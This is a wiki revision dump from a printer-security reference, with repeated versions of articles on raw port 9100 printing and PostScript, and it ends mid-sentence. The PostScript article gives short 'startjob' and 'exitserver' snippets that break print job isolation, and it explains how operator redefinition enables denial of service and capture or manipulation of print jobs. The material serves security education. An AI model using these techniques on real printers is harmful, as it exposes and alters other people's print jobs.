the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 66154de015870b8e6f0272e17c897fb809595551 260 259 2017-01-28T14:45:08Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 9f19f371f06c5fa8e20ddaf783a8426377303a51 259 253 2017-01-28T14:44:12Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Deployment of raw print jobs via port 9100/tcp]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 0db31c220c287b06e5f44405cad24cb761226351 253 235 2017-01-28T14:27:31Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|Deployment of print jobs via port 9100/tcp]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 8d03e224fe08518fce97d8c6ce4ee45022397ad4 235 223 2017-01-28T13:14:09Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers. Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 5e6f3bdfb89e050548c91f2f6b126cf0820d1265 223 222 2017-01-23T18:54:33Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 internet-accessible devices as printers. Attacking intranet printers however may also be attractive to an insider. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own wireless access point – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- a3d8581232920b8ec4ef5487f434172520197885 222 219 2017-01-23T18:53:18Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 internet-accessible devices as printers. Attacking intranet printers however may also be attractive to an insider. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own wireless access point – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- cd912416471cec619cf51d4cc71a273c1a55cbcc 219 84 2017-01-23T18:37:07Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 1734d0146ebcbe1de6ae77b1f10534cbb7197a66 84 2017-01-09T09:50:19Z Admin 1 Created page with "Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the ear..." wikitext text/x-wiki Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 412d63ed55fe46c46d7190893e768142fca0ff74 0 6 332 297 2017-01-31T15:49:33Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term ‘page description’ may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. In other words, a print job can access and alter further jobs. Bingo! === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 4b17ee18ed5102db80e1fb9ee3855e13bec11f31 297 208 2017-01-31T07:47:21Z 84.153.135.37 0 /* Operator redefinition */ wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. In other words, a print job can access and alter further jobs. Bingo! === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 2632d0b5ba8b3ff0b926970daea3b9a0e7c05244 208 207 2017-01-23T16:34:39Z Admin 1 /* Exiting the server loop */ wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. In other words, a print job can access and alter further jobs. Bingo! === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 92c2bdb9c659f442d4cd58313ad1c3f0d14e3747 207 206 2017-01-23T16:31:07Z Admin 1 /* Exiting the server loop */ wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and 